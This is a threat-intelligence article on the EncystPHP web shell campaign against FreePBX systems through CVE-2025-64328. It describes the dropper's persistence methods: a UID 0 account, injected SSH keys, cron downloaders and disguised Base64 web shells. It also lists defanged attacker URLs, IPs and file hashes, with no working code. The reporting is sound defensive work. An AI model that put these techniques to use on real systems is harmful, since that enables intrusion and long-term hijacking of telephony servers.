Weaponized EncystPHP Web Shell Exploits FreePBX Flaw to Seize Full Control of VoIP Systems

CyberDefender 8 mins0

FortiGuard Labs has identified and analyzed a sophisticated PHP web shell campaign that targets FreePBX systems. The malware, named EncystPHP, was deployed by exploiting the FreePBX Endpoint Manager vulnerability CVE-2025-64328, allowing attackers remote command execution, long-term persistence, and deep administrative control of compromised systems.

Target and Impact

  • Affected Platforms: FreePBX Endpoint Manager versions v17.0.2.36 – v17.0.3.
  • Severity: High
  • Impact: Remote attackers can fully compromise vulnerable systems and maintain long-term privileged access.
  • Affected Users: Any organization operating unpatched FreePBX environments.

This campaign is linked to the threat actor group INJ3CTOR3, previously observed targeting legacy PBX systems via different vulnerabilities.

Initial Intrusion and Delivery

EncystPHP was delivered through a post-authentication command-injection exploit against the FreePBX administrative interface (CVE-2025-64328). Attack traffic originated from Brazil, targeting an organization in India that provides cloud and telephony services. The attackers downloaded the initial dropper from 45[.]234[.]176[.]202, associated with a domain posing as a VoIP management site.

Once active, the malware positioned itself within the victim system via file “c”, which served as the main dropper for subsequent activity.

Malware Behavior and System Impact

1. System Modification and Initial Actions

Upon execution, the EncystPHP dropper:

  • Changes permissions on existing FreePBX PHP files (ajax.php, model.php) to 000, making them unreadable and non-executable.
  • Gathers database configuration data from /etc/freepbx.conf.
  • Deletes cron jobs and numerous FreePBX user accounts (e.g., “ampuser”, “svc_freepbx”, “emoadmin”, “FreePBX_setup”).
  • Searches for and deletes other web shells and PHP files containing known malicious strings, reducing competition for control.

2. Privilege Escalation and Account Compromise

To solidify control over the system:

  • A root-level user newfpbx is created with UID 0 and a known encrypted password.
  • Multiple existing user passwords are reset to a common password.
  • The attacker injects an SSH public key and ensures SSH port 22 remains open.

This allows the attacker to execute shell commands and maintain remote shell access.

3. Secondary Dropper and Web Shell Deployment

EncystPHP deploys a second dropper named k.php, which:

  • Carries another Base64-encoded PHP web shell.
  • Decodes and writes this payload to disk, commonly as ajax.php (imitating legitimate FreePBX files).
  • Creates directories under /var/www/html/ (e.g., phones/, freepbxphones/, rest_phones/) to distribute multiple instances of the web shell, improving resilience against removal.
  • Forged timestamps on these files to match legitimate ones, masking malicious modifications.

EncystPHP Web Shell Functionality

The web shell decoded by the dropper offers an interactive interface titled “Ask Master”. Key characteristics include:

  • Authentication: A plaintext password is hashed with MD5 and checked against a hard-coded hash within the payload.
  • Post-Authentication Operations:
    • File system enumeration
    • Process inspection
    • Querying of active Asterisk channels
    • Listing of SIP peers
    • Retrieval of FreePBX/Elastix configuration files
  • The shell has sufficient privileges for arbitrary command execution and can abuse the PBX environment to generate outbound calls or other telephony activities.

Persistence Mechanisms

EncystPHP implements persistence in four coordinated stages:

  1. Crontab Installations: The initial dropper (c) installs cron jobs that download k.php every minute, saving it under benign-looking binaries.
  2. Persistence Shell Script (test.sh): Decodes and writes a PHP component license.php, which itself downloads other droppers and sets up more cron jobs.
  3. Repetitive Downloader: A cron job installs a downloader saved as a different benign-named binary, mimicking removal by echoing removal commands (not executed).
  4. License Component: A Base64-encoded PHP file repeatedly fetches droppers and ensures execution while disabling error reporting and cleaning logs to hide forensic evidence.

Indicators of Compromise (IOCs)

URLs

hxxp://45[.]234[.]176[.]202/new/c
hxxp://45[.]234[.]176[.]202/new/k.php

Hosts

45[.]234[.]176[.]202
187[.]108[.]1[.]130

Files

71d94479d58c32d5618ca1e2329d8fa62f930e0612eb108ba3298441c6ba0302
7e3a47e3c6b82eb02f6f1e4be6b8de4762194868a8de8fc9103302af7915c574
fc514c45fa8e3a49f003eae4e0c8b6a523409b8341503b529c85ffe396bb74f2
285fac34a5ffdac7cb047d412862e1ca5e091e70c0ac0383b71159fdd0d20bb2
29d74963f99563e711e5db39261df759f76da6893f3ca71a4704b9ee2b26b8c7

MITRE ATT&CK Mapping

FortiGuard’s analysis maps this campaign to multiple ATT&CK techniques, including:

  • Initial Access: Exploitation of public-facing applications
  • Execution: Unix shell command execution
  • Persistence: Cron jobs, web shell deployment
  • Privilege Escalation: Local account creation and exploitation
  • Credential Access: Database credential collection
  • Defense Evasion: Deleting logs and modifying permissions
  • Command & Control: Repeated remote dropper downloads
  • Impact: Abuse of PBX telephony functions

Conclusion & Mitigation

The EncystPHP campaign highlights how unpatched PBX systems are prime targets for advanced web shells that evade detection and retain long-term control. Combining stealthy persistence, privilege escalation, and administrative access, this web shell enables attackers to fully compromise FreePBX environments.

Organizations should treat exploitation of CVE-2025-64328 as a full compromise, perform immediate remediation, and strengthen security monitoring and hardening to mitigate risks.

CyberDefender